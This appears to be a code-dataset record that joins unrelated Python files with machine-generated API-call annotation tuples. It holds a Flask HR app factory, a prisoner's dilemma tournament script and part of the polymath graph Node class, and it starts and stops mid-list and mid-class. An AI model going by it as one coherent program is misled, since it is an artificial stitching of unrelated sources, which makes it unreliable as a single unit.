prompt_toolkit.key_binding.bindings.mouse import load_mouse_bindings\n'), ((1781, 1800), 'prompt_toolkit.key_binding.bindings.cpr.load_cpr_bindings', 'load_cpr_bindings', ([], {}), '()\n', (1798, 1800), False, 'from prompt_toolkit.key_binding.bindings.cpr import load_cpr_bindings\n'), ((12687, 12705), 'prompt_toolkit.key_binding.bindings.named_commands.accept_line', 'accept_line', (['event'], {}), '(event)\n', (12698, 12705), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((12873, 12891), 'prompt_toolkit.key_binding.bindings.named_commands.accept_line', 'accept_line', (['event'], {}), '(event)\n', (12884, 12891), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((11679, 11688), 'prompt_toolkit.application.current.get_app', 'get_app', ([], {}), '()\n', (11686, 11688), False, 'from prompt_toolkit.application.current import get_app\n'), ((25967, 25979), 're.escape', 're.escape', (['i'], {}), '(i)\n', (25976, 25979), False, 'import re\n'), ((28323, 28344), 'textwrap.dedent', 'textwrap.dedent', (['text'], {}), '(text)\n', (28338, 28344), False, 'import textwrap\n')] |
# 初始化模块
from config import Config
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
# 数据库操作对象
db = SQLAlchemy()
# 创建app
def create_app():
# flask操作对象
app = Flask(__name__)
# 通过配置文件读取并应用配置
app.config.from_object(Config)
# 初始化数据库
db.init_app(app)
# 员工管理子系统
from app.view import employee
# 职位管理子系统
from app.view import post
# 部门管理子系统
from app.view import department
# 工资管理子系统
from app.view import salary
# 考勤管理子系统
from app.view import attendance
# 统一对外接口蓝本
app.register_blueprint(employee)
app.register_blueprint(post)
app.register_blueprint(department)
app.register_blueprint(salary)
app.register_blueprint(attendance)
return app
| [
"flask_sqlalchemy.SQLAlchemy",
"flask.Flask"
] | [((114, 126), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', ([], {}), '()\n', (124, 126), False, 'from flask_sqlalchemy import SQLAlchemy\n'), ((181, 196), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (186, 196), False, 'from flask import Flask\n')] |
import os
import itertools
import importlib
import numpy as np
import random
STRATEGY_FOLDER = "exampleStrats"
RESULTS_FILE = "results.txt"
pointsArray = [[1,5],[0,3]] # The i-j-th element of this array is how many points you receive if you do play i, and your opponent does play j.
moveLabels = ["D","C"]
# D = defect, betray, sabotage, free-ride, etc.
# C = cooperate, stay silent, comply, upload files, etc.
# Returns a 2-by-n numpy array. The first axis is which player (0 = us, 1 = opponent)
# The second axis is which turn. (0 = first turn, 1 = next turn, etc.
# For example, it might return
#
# [[0 0 1] a.k.a. D D C
# [1 1 1]] a.k.a. C C C
#
# if there have been 3 turns, and we have defected twice then cooperated once,
# and our opponent has cooperated all three times.
def getVisibleHistory(history, player, turn):
historySoFar = history[:,:turn].copy()
if player == 1:
historySoFar = np.flip(historySoFar,0)
return historySoFar
def runRound(pair):
moduleA = importlib.import_module(STRATEGY_FOLDER+"."+pair[0])
moduleB = importlib.import_module(STRATEGY_FOLDER+"."+pair[1])
memoryA = None
memoryB = None
LENGTH_OF_GAME = int(200-40*np.log(random.random())) # The games are a minimum of 50 turns long. The np.log here guarantees that every turn after the 50th has an equal (low) chance of being the final turn.
history = np.zeros((2,LENGTH_OF_GAME),dtype=int)
for turn in range(LENGTH_OF_GAME):
playerAmove, memoryA = moduleA.strategy(getVisibleHistory(history,0,turn),memoryA)
playerBmove, memoryB = moduleB.strategy(getVisibleHistory(history,1,turn),memoryB)
history[0,turn] = playerAmove
history[1,turn] = playerBmove
return history
def tallyRoundScores(history):
scoreA = 0
scoreB = 0
ROUND_LENGTH = history.shape[1]
for turn in range(ROUND_LENGTH):
playerAmove = history[0,turn]
playerBmove = history[1,turn]
scoreA += pointsArray[playerAmove][playerBmove]
scoreB += pointsArray[playerBmove][playerAmove]
return scoreA/ROUND_LENGTH, scoreB/ROUND_LENGTH
def outputRoundResults(f, pair, roundHistory, scoresA, scoresB):
f.write(pair[0]+" (P1) VS. "+pair[1]+" (P2)\n")
for p in range(2):
for t in range(roundHistory.shape[1]):
move = roundHistory[p,t]
f.write(moveLabels[move]+" ")
f.write("\n")
f.write("Final score for "+pair[0]+": "+str(scoresA)+"\n")
f.write("Final score for "+pair[1]+": "+str(scoresB)+"\n")
f.write("\n")
def pad(stri, leng):
result = stri
for i in range(len(stri),leng):
result = result+" "
return result
def runFullPairingTournament(inFolder, outFile):
print("Starting tournament, reading files from "+inFolder)
scoreKeeper = {}
STRATEGY_LIST = []
for file in os.listdir(inFolder):
if file.endswith(".py"):
STRATEGY_LIST.append(file[:-3])
for strategy in STRATEGY_LIST:
scoreKeeper[strategy] = 0
f = open(outFile,"w+")
for pair in itertools.combinations(STRATEGY_LIST, r=2):
roundHistory = runRound(pair)
scoresA, scoresB = tallyRoundScores(roundHistory)
outputRoundResults(f, pair, roundHistory, scoresA, scoresB)
scoreKeeper[pair[0]] += scoresA
scoreKeeper[pair[1]] += scoresB
scoresNumpy = np.zeros(len(scoreKeeper))
for i in range(len(STRATEGY_LIST)):
scoresNumpy[i] = scoreKeeper[STRATEGY_LIST[i]]
rankings = np.argsort(scoresNumpy)
f.write("\n\nTOTAL SCORES\n")
for rank in range(len(STRATEGY_LIST)):
i = rankings[-1-rank]
score = scoresNumpy[i]
scorePer = score/(len(STRATEGY_LIST)-1)
f.write("#"+str(rank+1)+": "+pad(STRATEGY_LIST[i]+":",16)+' %.3f'%score+' (%.3f'%scorePer+" average)\n")
f.flush()
f.close()
print("Done with everything! Results file written to "+RESULTS_FILE)
runFullPairingTournament(STRATEGY_FOLDER, RESULTS_FILE)
| [
"numpy.flip",
"os.listdir",
"importlib.import_module",
"itertools.combinations",
"numpy.argsort",
"numpy.zeros",
"random.random"
] | [((1069, 1125), 'importlib.import_module', 'importlib.import_module', (["(STRATEGY_FOLDER + '.' + pair[0])"], {}), "(STRATEGY_FOLDER + '.' + pair[0])\n", (1092, 1125), False, 'import importlib\n'), ((1137, 1193), 'importlib.import_module', 'importlib.import_module', (["(STRATEGY_FOLDER + '.' + pair[1])"], {}), "(STRATEGY_FOLDER + '.' + pair[1])\n", (1160, 1193), False, 'import importlib\n'), ((1462, 1502), 'numpy.zeros', 'np.zeros', (['(2, LENGTH_OF_GAME)'], {'dtype': 'int'}), '((2, LENGTH_OF_GAME), dtype=int)\n', (1470, 1502), True, 'import numpy as np\n'), ((2994, 3014), 'os.listdir', 'os.listdir', (['inFolder'], {}), '(inFolder)\n', (3004, 3014), False, 'import os\n'), ((3249, 3291), 'itertools.combinations', 'itertools.combinations', (['STRATEGY_LIST'], {'r': '(2)'}), '(STRATEGY_LIST, r=2)\n', (3271, 3291), False, 'import itertools\n'), ((3711, 3734), 'numpy.argsort', 'np.argsort', (['scoresNumpy'], {}), '(scoresNumpy)\n', (3721, 3734), True, 'import numpy as np\n'), ((982, 1006), 'numpy.flip', 'np.flip', (['historySoFar', '(0)'], {}), '(historySoFar, 0)\n', (989, 1006), True, 'import numpy as np\n'), ((1276, 1291), 'random.random', 'random.random', ([], {}), '()\n', (1289, 1291), False, 'import random\n')] |
from polymath import UNSET_SHAPE, DEFAULT_SHAPES
import builtins
import operator
from collections import OrderedDict, Mapping, Sequence, deque
import functools
from numbers import Integral, Rational, Real
import contextlib
import traceback
import uuid
import numpy as np
import importlib
from .graph import Graph
from .domain import Domain
from .util import _noop_callback, _flatten_iterable, node_hash, \
_is_node_type_instance, is_iterable
class Node(object):
"""
Base class for nodes.
Parameters
----------
args : tuple
Positional arguments passed to the `_evaluate` method.
name : str or None
Name of the node or `None` to use a random, unique identifier.
shape : tuple or None
Shape of the output for a node. This can be a tuple of integers or parameter node names.
graph : Node or None
Parent graph of this node. If graph is `None`, this is the top-level graph.
op_name : str
Operation name which describes the node functionality.
value : Any or None
If a node has a default value to use for execution, it can be set using `value`.
kwargs : dict
Keyword arguments passed to the `_evaluate` method.
"""
_graph_stack = deque([None])
_eval_stack = []
stack_size = 5
evaluated_nodes = 0
def __init__(self, *args,
name=None,
shape=None,
graph=None,
dependencies=None,
op_name=None,
value=None,
**kwargs):
self.nodes = Graph()
self.value = value
self.dependencies = []
self._args = []
self._predeecessors = []
self._succesors = []
self.args = args
if "name" in kwargs:
kwargs.pop("name")
self.added_attrs = []
# TODO: CHange this to underscore private variable
self.kwargs = kwargs
self.graph = graph
self._shape = OrderedDict()
self.shape = shape or tuple([])
# Get a list of all dependencies relevant to this node
self.dependencies = [] if dependencies is None else dependencies
if self.graph:
self.dependencies.extend(self.graph.dependencies)
# Choose a name for the node and add the node to the graph
self._name = None
self.name = name or uuid.uuid4().hex
self._op_name = None
self.op_name = op_name
# Get the stack context so we can report where the node was defined
self._stack = traceback.extract_stack(limit=1)
@property
def graph(self):
"""
polymath.srdfg.graph.Graph : Parent graph of this node. If graph is `None`, this is the top-level graph.
"""
return self._graph
def preds(self):
return self._preds
def succs(self):
return self._preds
def add_predecessor(self, pred):
if isinstance(pred, Node):
self._predecessors.append(pred.gname)
else:
self._predecessors.append(pred)
def add_successor(self, succ):
if isinstance(succ, Node):
self._succesors.append(succ.gname)
else:
self._succesors.append(succ)
def set_edges(self):
for e in self.args:
self.add_predecessor(e)
if isinstance(e, Node):
e.add_successor(self)
@property
def domain(self):
return Domain(tuple([]))
@property
def args(self):
"""
tuple : Positional arguments which are used for executing this node.
"""
return tuple(self._args)
@property
def argnames(self):
return [a.name if isinstance(a, Node) else a for a in self.args]
@property
def shape(self):
"""
tuple : Shape of the output for a node. This can be a tuple of integers or parameter node names.
"""
return self._shape
@property
def var(self):
return self
@property
def name(self):
"""str : Unique name of the node"""
return self._name
@property
def op_name(self):
"""
str : Operation name which describes the node functionality.
"""
return self._op_name
@op_name.setter
def op_name(self, op_name):
if op_name:
self._op_name = op_name
elif self.__class__.__name__ == "Node":
self._op_name = self.name
else:
self._op_name = self.__class__.__name__
@name.setter
def name(self, name):
self.set_name(name)
@args.setter
def args(self, args):
new_args = []
for arg in args:
if isinstance(arg, Node):
if self.__class__.__name__ == "Node":
self.nodes[arg.name] = self.graph[arg.name]
new_args.append(arg)
self._args = tuple(new_args)
@shape.setter
def shape(self, shape):
self.set_shape(shape, init=True)
@graph.setter
def graph(self, graph):
self._graph = Node.get_active_graph(graph)
@property
def gname(self):
scope_names = [self.name]
cgraph = self.graph
while cgraph:
scope_names.append(cgraph.name)
cgraph = cgraph.graph
return "/".join(list(reversed(scope_names)))
def __enter__(self):
Node._graph_stack.append(self)
return self
def __exit__(self, *args):
assert self == Node._graph_stack.pop()
def __repr__(self):
return "<node '%s'>" % self.name
def add_attribute(self, key, value):
self.added_attrs.append(key)
self.kwargs[key] = value
def is_shape_finalized(self):
if self.shape == UNSET_SHAPE:
return False
for s in self.shape:
if not isinstance(s, Integral):
return False
return True
def set_shape(self, shape=None, init=False):
if isinstance(shape, float):
self._shape = tuple([np.int(shape)])
elif isinstance(shape, Integral):
self._shape = tuple([shape])
elif isinstance(shape, Node):
self._shape = tuple([shape])
elif not shape or len(shape) == 0:
# TODO: Change in order to enable "is shape finalized" to work
self._shape = UNSET_SHAPE
else:
shapes = []
for dim in shape:
if isinstance(dim, (Node, Integral)):
shapes.append(dim)
elif isinstance(dim, float):
shapes.append(int(dim))
else:
raise TypeError(f"Shape value must be placeholder or integer value for {self.name}\n"
f"\tDim: {dim}"
f"\n\t{self.kwargs} ")
self._shape = tuple(shapes)
@staticmethod
def get_active_graph(graph=None):
"""
Obtain the currently active graph instance by returning the explicitly given graph or using
the default graph.
Parameters
----------
graph : Node or None
Graph to return or `None` to use the default graph.
Raises
------
ValueError
If no `Graph` instance can be obtained.
"""
graph = graph or Node._graph_stack[-1]
return graph
def instantiate_node(self, node): # pylint:disable=W0621
"""
Instantiate nodes by retrieving the node object associated with the node name.
Parameters
----------
node : Node or str
Node instance or name of an node.
Returns
-------
instantiated_node : Node
Node instance.
Raises
------
ValueError
If `node` is not an `Node` instance or an node name.
RuntimeError
If `node` is an `Node` instance but does not belong to this graph.
"""
if isinstance(node, str):
return self.nodes[node]
if isinstance(node, Node):
if node.name not in self.nodes and (node.graph != self):
raise RuntimeError(f"node '{node}' does not belong to {self} graph, instead belongs to"
f" {node.graph}")
return node
raise ValueError(f"'{node}' is not an `Node` instance or node name")
def instantiate_graph(self, context, **kwargs):
"""
Instantiate a graph by replacing all node names with node instances.
.. note::
This function modifies the context in place. Use :code:`context=context.copy()` to avoid
the context being modified.
Parameters
----------
context : dict[Node or str, object]
Context whose keys are node instances or names.
kwargs : dict[str, object]
Additional context information keyed by variable name.
Returns
-------
normalized_context : dict[Node, object]
Normalized context whose keys are node instances.
Raises
------
ValueError
If the context specifies more than one value for any node.
ValueError
If `context` is not a mapping.
"""
if context is None:
context = {}
elif not isinstance(context, Mapping):
raise ValueError("`context` must be a mapping.")
nodes = list(context)
# Add the keyword arguments
for node in nodes: # pylint:disable=W0621
value = context.pop(node)
node = self.instantiate_node(node)
if node in context:
raise ValueError(f"duplicate unequal value for node '{node}'")
context[node] = value
if node.op_name in ["placeholder", "state", "input", "output", "temp"] and not node.is_shape_finalized():
context[node] = node.evaluate(context)
for name, value in kwargs.items():
node = self.nodes[name]
if node in context:
raise ValueError(f"duplicate value for node '{node}'")
context[node] = value
if node.op_name in ["placeholder", "state", "input", "output", "temp"] and not node.is_shape_finalized():
context[node] = node.evaluate(context)
return context
def run(self, fetches, context=None, *, callback=None, **kwargs):
"""
Evaluate one or more nodes given a dictionary of node names with their values.
.. note::
This function modifies the context in place. Use :code:`context=context.copy()` to avoid
the context being modified.
Parameters
----------
fetches : list[str or Node] or str or Node
One or more `Node` instances or names to evaluate.
context : dict or None
Context in which to evaluate the nodes.
callback : callable or None
Callback to be evaluated when an node is evaluated.
kwargs : dict
Additional context information keyed by variable name.
Returns
-------
values : Node or tuple[object]
Output of the nodes given the context.
Raises
------
ValueError
If `fetches` is not an `Node` instance, node name, or a sequence thereof.
"""
if isinstance(fetches, (str, Node)):
fetches = [fetches]
single = True
elif isinstance(fetches, Sequence):
single = False
else:
raise ValueError("`fetches` must be an `Node` instance, node name, or a "
"sequence thereof.")
fetches = [self.instantiate_node(node) for node in fetches]
context = self.instantiate_graph(context, **kwargs)
for c in context:
if c in fetches and c.op_name in ["output", "state", "temp"]:
write_name = "/".join([f"{i}{c.write_count-1}" for i in c.name.split("/")]) if c.write_count > 0 else c.name
fetches[fetches.index(c)] = c.graph.nodes[write_name]
values = [fetch.evaluate_node(fetch, context, callback=callback) for fetch in fetches]
return values[0] if single else tuple(values)
def __getstate__(self):
return self.__dict__
def __setstate__(self, data):
self.__dict__.update(data)
def set_name(self, name):
"""
Set the name of the node and update the graph.
Parameters
----------
value : str
Unique name of the node.
Returns
-------
self : Node
This node.
Raises
------
ValueError
If an node with `value` already exists in the associated graph.
KeyError
If the current name of the node cannot be found in the associated graph.
"""
name = name or uuid.uuid4().hex
# TODO: Need a way to check if the existing node is not equal to the current ndoe as ewll
if self.graph and name in self.graph.nodes:
raise ValueError(f"duplicate name '{name}' in {self.graph.name}:\n\t"
f"Existing: {self.graph.nodes[name].args}\n\t"
f"New: {self.args}")
if self.graph:
graph = self.graph
if self._name and self._name in graph.nodes:
graph.update_graph_key(self._name, name)
else:
graph.nodes[name] = self
self._name = name
return self
def evaluate_dependencies(self, context, callback=None):
"""
Evaluate the dependencies of this node and discard the values.
Parameters
----------
context : dict
Normalised context in which to evaluate the node.
callback : callable or None
Callback to be evaluated when an node is evaluated.
"""
for node in self.dependencies:
node.evaluate(context, callback)
def evaluate(self, context, callback=None):
"""
Evaluate the node given a context.
Parameters
----------
context : dict
Normalised context in which to evaluate the node.
callback : callable or None
Callback to be evaluated when an node is evaluated.
Returns
-------
value : object
Output of the node given the context.
"""
# Evaluate all explicit dependencies first
self.evaluate_dependencies(context, callback)
if self in context:
return context[self]
# Evaluate the parents
partial = functools.partial(self.evaluate_node, context=context, callback=callback)
args = [partial(arg) for arg in self.args]
kwargs = {key: partial(value) for key, value in self.kwargs.items() if key not in self.added_attrs}
# Evaluate the node
callback = callback or _noop_callback
with callback(self, context):
if self.__class__.__name__ == "Node":
context[self] = self.value = self._evaluate(*args, context=context, **kwargs)
else:
context[self] = self.value = self._evaluate(*args, **kwargs)
return self.value
def _evaluate(self, *args, context=None, **kwargs):
"""
Inheriting nodes should implement this function to evaluate the node.
"""
return self(*args, context, **kwargs)
@classmethod
def evaluate_node(cls, node, context, **kwargs):
"""
Evaluate an node or constant given a context.
"""
Node.evaluated_nodes += 1
try:
if isinstance(node, Node):
Node._eval_stack.append(node.name)
return node.evaluate(context, **kwargs)
partial = functools.partial(cls.evaluate_node, context=context, **kwargs)
if isinstance(node, tuple):
return tuple(partial(element) for element in node)
if isinstance(node, list):
return [partial(element) for element in node]
if isinstance(node, dict):
return {partial(key): partial(value) for key, value in node.items()}
if isinstance(node, slice):
return slice(*[partial(getattr(node, attr))
for attr in ['start', 'stop', 'step']])
return node
except Exception as ex: # pragma: no cover
messages = []
interactive = False
if isinstance(node, Node) or not is_iterable(node):
node = [node]
for n in node:
stack = []
if isinstance(n, Node):
for frame in reversed(n._stack): # pylint: disable=protected-access
# Do not capture any internal stack traces
fname = frame.filename
if 'polymath' in fname:
continue
# Stop tracing at the last interactive cell
if interactive and not fname.startswith('<'):
break # pragma: no cover
interactive = fname.startswith('<')
stack.append(frame)
stack = "".join(traceback.format_list(reversed(stack)))
message = "Failed to evaluate node `%s` defined at:\n\n%s" % (n, stack)
messages.append(message)
raise ex from EvaluationError("".join(messages))
@classmethod
def init_from_args(cls, *args,
name=None,
shape=None,
graph=None,
dependencies=None,
op_name=None,
value=None,
**kwargs):
if len(args) == 0:
n = cls(name=name,
shape=shape,
graph=graph,
op_name=op_name,
dependencies=dependencies,
value=value,
**kwargs)
else:
n = cls(*args,
name=name,
shape=shape,
graph=graph,
op_name=op_name,
dependencies=dependencies,
value=value,
**kwargs)
return n
def __bool__(self):
return True
def __hash__(self):
return id(self)
def func_hash(self):
"""
This returns the functional hash of a particular node. The default hash returns an object id, whereas this function
returns a hash of all attributes and subgraphs of a node.
"""
return node_hash(self)
def find_node(self, name):
g = self.graph
while g is not None and name not in g.nodes:
g = g.graph
if name in g.nodes:
return g.nodes[name]
raise RuntimeError(f"Cannot find {name} in graph nodes. Graph: {self.graph}")
def __len__(self):
#TODO: Update this to check for finalzied shape
if self.shape == UNSET_SHAPE:
raise TypeError(f'`shape` must be specified explicitly for nodes {self}')
return self.shape[0]
def __iter__(self):
num = len(self)
for i in range(num):
yield self[i]
def __eq__(self, other):
return hash(self) == hash(other)
def __getattr__(self, name):
return getattr_(self, name, graph=self.graph)
def __getitem__(self, key):
if self.__class__.__name__ != "Node":
if isinstance(key, (slice, Integral)):
return getitem(self, key, graph=self.graph)
else:
if isinstance(key, (list)):
return var_index(self, key, graph=self)
elif isinstance(key, tuple):
return var_index(self, list(key), graph=self)
else:
return var_index(self, [key], graph=self)
else:
return self.nodes[key]
def __add__(self, other):
return add(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__radd__(self)
def __radd__(self, other):
return add(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__add__(self)
def __sub__(self, other):
return sub(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rsub__(self)
def __rsub__(self, other):
return sub(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__sub__(self)
def __pow__(self, other):
return pow_(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rpow__(self)
def __rpow__(self, other):
return pow_(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rpow__(self)
def __matmul__(self, other):
return matmul(self, other, graph=self.graph)
def __rmatmul__(self, other):
return matmul(other, self, graph=self.graph)
def __mul__(self, other):
return mul(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rmul__(self)
def __rmul__(self, other):
return mul(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__mul__(self)
def __truediv__(self, other):
return truediv(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__truediv__(self)
def __rtruediv__(self, other):
return truediv(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rtruediv__(self)
def __floordiv__(self, other):
return floordiv(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rfloordiv__(self)
def __rfloordiv__(self, other):
return floordiv(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__floordiv__(self)
def __mod__(self, other):
return mod(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rmod__(self)
def __rmod__(self, other):
return mod(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__mod__(self)
def __lshift__(self, other):
return lshift(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rlshift__(self)
def __rlshift__(self, other):
return lshift(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__lshift__(self)
def __rshift__(self, other):
return rshift(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rrshift__(self)
def __rrshift__(self, other):
return rshift(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rshift__(self)
def __and__(self, other):
return and_(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rand__(self)
def __rand__(self, other):
return and_(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__and__(self)
def __or__(self, other):
return or_(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__ror__(self)
def __ror__(self, other):
return or_(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__or__(self)
def __xor__(self, other):
return xor(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rxor__(self)
def __rxor__(self, other):
return xor(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__xor__(self)
def __lt__(self, other):
return lt(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__gt__(self)
def __le__(self, other):
return le(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__ge__(self)
def __ne__(self, other):
return ne(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__ne__(self)
def __gt__(self, other):
return gt(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__lt__(self)
def __ge__(self, other):
return ge(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__le__(self)
def __invert__(self):
return inv(self, graph=self.graph)
def __neg__(self):
return neg(self, graph=self.graph)
def __abs__(self):
return abs_(self, graph=self.graph)
def __pos__(self):
return pos(self, graph=self.graph)
def __reversed__(self):
return reversed_(self, graph=self.graph)
def update_graph_key(self, old_key, new_key):
n = list(map(lambda k: (new_key, self.nodes[k]) if k == old_key else (k, self.nodes[k]), self.nodes.keys()))
self.nodes = Graph(n)
def insert_node(self, node, idx):
node_list = list(self.nodes.items())
node_list.insert(idx, (node.name, node))
self.nodes = Graph(node_list)
def __call__(self, *args, **kwargs):
return self.run(*args, **kwargs)
class EvaluationError(RuntimeError):
"""
Failed to evaluate an node.
"""
class var_index(Node): # pylint: disable=C0103,W0223
"""
Node representing values of a variable corresponding to input index values.
Parameters
----------
var : Node
The multi-dimensional variable used for indexing into.
idx : tuple
Tuple of either integer values or index/index_op nodes.
"""
def __init__(self, var, idx, name=None, **kwargs): # pylint: disable=W0235
if "domain" in kwargs:
domain = tuple(kwargs.pop("domain")) if isinstance(kwargs["domain"], list) else kwargs.pop("domain")
else:
domain = Domain(idx)
super(var_index, self).__init__(var, idx, name=name, domain=domain, **kwargs)
@property
def domain(self):
return self.kwargs["domain"]
@property
def var(self):
var, index_list = self.args
return var
def set_name(self, name):
"""
Set the name for a variable index, making sure to replicate the new name with
a unique stringwhich corresponds to the variable, index combination.
Parameters
----------
value : str
Unique name of the node.
Returns
-------
self : Node
This node.
Raises
------
ValueError
If an node with `value` already exists in the associated graph.
KeyError
If the current name of the node cannot be found in the associated graph.
"""
# TODO: Need a way to check if the existing node is not equal to the current ndoe as ewll
if self.graph and name in self.graph.nodes:
raise ValueError(f"duplicate name '{name}' in {self.graph.name}:"
f"Existing: {self.graph.nodes[name].args}\n"
f"New: {self.args}")
if self.graph:
graph = self.graph
if self._name is not None and self._name in graph.nodes:
graph.update_graph_key(self._name, name)
else:
graph.nodes[name] = self
self._name = name
return self
def __getitem__(self, key):
if self.is_shape_finalized() and len(self.nodes) >= np.prod(self.shape):
if isinstance(key, Integral):
key = tuple([key])
idx = np.ravel_multi_index(key, dims=self.shape, order='C')
ret = self.nodes.item_by_index(idx)
return ret
else:
if isinstance(key, (list)):
ret = var_index(self.var, tuple(key), graph=self)
elif isinstance(key, tuple):
ret = var_index(self.var, key, graph=self)
else:
ret = var_index(self.var, tuple([key]), graph=self)
return ret
def is_scalar(self, val=None):
if val is not None and (not isinstance(val, np.ndarray) or (len(val.shape) == 1 and val.shape[0] == 1)):
if self.var.shape != DEFAULT_SHAPES[0] and (len(self.var.shape) == 1 and not isinstance(self.var.shape[0],Node)):
raise ValueError(f"Invalid shape var for var index {self} with variable shape {self.var.shape}")
return True
else:
return self.var.shape == DEFAULT_SHAPES[0]
def _evaluate(self, var, indices, **kwargs):
if self.is_scalar(var):
out_shape = (1,)
indices = (0,)
single = True
else:
out_shape = self.domain.shape_from_indices(indices)
indices = self.domain.compute_pairs()
single = False
if isinstance(var, (Integral, Real, str)):
var = np.asarray([var])
elif not isinstance(var, (np.ndarray, list)):
raise TypeError(f"Variable {var} with type {type(var)} is not a list or numpy array, and cannot be sliced for {self.name}")
elif isinstance(var, list):
var = np.asarray(var)
if len(var.shape) != len(out_shape) and np.prod(var.shape) == np.prod(out_shape):
if len(out_shape) > len(var.shape):
for i in range(len(out_shape)):
if out_shape[i] == 1:
var = np.expand_dims(var, axis=i)
else:
var = np.squeeze(var)
if len(var.shape) != len(out_shape) and np.prod(var.shape) != np.prod(out_shape):
raise ValueError(f"Index list does not match {var.shape} in {self.var.name} - {self.var.op_name}"
f"dimensions for slice {self.args[0].name} with {out_shape}.\n"
f"Domain: {self.domain}\n"
f"Eval Stack: {Node._eval_stack}")
if not single and not all([(idx_val - 1) >= indices[-1][idx] for idx, idx_val in enumerate(var.shape)]):
raise ValueError(f"var_index {self.name} has indices which are greater than the variable shape:\n"
f"\tArgs: {self.args}\n"
f"\tVar shape: {var.shape}\n"
f"\tNode shape: {self.var.shape}\n"
f"\tIndex Upper bounds: {indices[-1]}")
indices = list(map(lambda x: x.tolist() if isinstance(x, np.ndarray) else x, indices))
res = var[indices] if single else np.asarray([var[idx] for idx in indices]).reshape(out_shape)
if out_shape == (1,) and len(indices) == 1:
res = res[0]
self.domain.set_computed(out_shape, indices)
return res
def __add__(self, other):
return slice_op(operator.add, self, other, graph=self.graph)
def __radd__(self, other):
return slice_op(operator.add, other, self, graph=self.graph)
def __sub__(self, other):
return slice_op(operator.sub, self, other, graph=self.graph)
def __rsub__(self, other):
return slice_op(operator.sub, other, self, graph=self.graph)
def __pow__(self, other):
return slice_op(builtins.pow, self, other, graph=self.graph)
def __rpow__(self, other):
return slice_op(builtins.pow, other, self, graph=self.graph)
def __mul__(self, other):
return slice_op(operator.mul, self, other, graph=self.graph)
def __rmul__(self, other):
return slice_op(operator.mul, other, self, graph=self.graph)
def __truediv__(self, other):
return slice_op(operator.truediv, self, other, graph=self.graph)
def __rtruediv__(self, other):
return slice_op(operator.truediv, other, self, graph=self.graph)
def __floordiv__(self, other):
return slice_op(operator.floordiv, self, other, graph=self.graph)
def __rfloordiv__(self, other):
return slice_op(operator.floordiv, other, self, graph=self.graph)
def __mod__(self, other):
return slice_op(operator.mod, self, other, graph=self.graph)
def __rmod__(self, other):
return slice_op(operator.mod, other, self, graph=self.graph)
def __lshift__(self, other):
return slice_op(operator.lshift, self, other, graph=self.graph)
def __rlshift__(self, other):
return slice_op(operator.lshift, other, self, graph=self.graph)
def __rshift__(self, other):
return slice_op(operator.rshift, self, other, graph=self.graph)
def __rrshift__(self, other):
return slice_op(operator.rshift, other, self, graph=self.graph)
def __and__(self, other):
return slice_op(operator.and_, self, other, graph=self.graph)
def __rand__(self, other):
return slice_op(operator.and_, other, self, graph=self.graph)
def __or__(self, other):
return slice_op(operator.or_, self, other, graph=self.graph)
def __ror__(self, other):
return slice_op(operator.or_, other, self, graph=self.graph)
def __xor__(self, other):
return slice_op(operator.xor, self, other, graph=self.graph)
def __rxor__(self, other):
return slice_op(operator.xor, other, self, graph=self.graph)
def __lt__(self, other):
return slice_op(operator.lt, self, other, graph=self.graph)
def __le__(self, other):
return slice_op(operator.lt, other, self, graph=self.graph)
def __ne__(self, other):
return slice_op(operator.ne, self, other, graph=self.graph)
def __gt__(self, other):
return slice_op(operator.gt, self, other, graph=self.graph)
def __ge__(self, other):
return slice_op(operator.ge, self, other, graph=self.graph)
def __repr__(self):
return "<var_index name=%s, index=%s>" % (self.name, self.args)
class slice_op(Node):
"""
